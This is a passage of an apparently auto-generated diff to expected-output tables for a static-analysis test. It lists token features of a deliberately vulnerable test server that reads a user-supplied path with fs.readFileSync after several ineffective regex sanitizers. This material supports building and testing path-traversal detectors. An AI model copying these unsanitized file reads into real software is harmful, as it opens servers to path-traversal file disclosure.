path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:16:172:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:16:172:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | path.re ... /g, '') | calleeImports | fs | @@ -6101,6 +64119,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:172:29:172:64 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:172:34:172:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:34:172:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:34:172:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:34:172:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:34:172:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:172:42:172:59 | /[foobar/foobar]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:172:42:172:59 | /[foobar/foobar]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:172:42:172:59 | /[foobar/foobar]/g | calleeImports | url | @@ -6119,6 +64142,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:172:62:172:63 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:172:62:172:63 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:172:62:172:63 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:3:173:53 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:7:173:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:7:173:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:7:173:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:7:173:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:7:173:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6127,6 +64190,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:173:13:173:52 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:173:16:173:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:16:173:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:16:173:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:16:173:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:16:173:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify 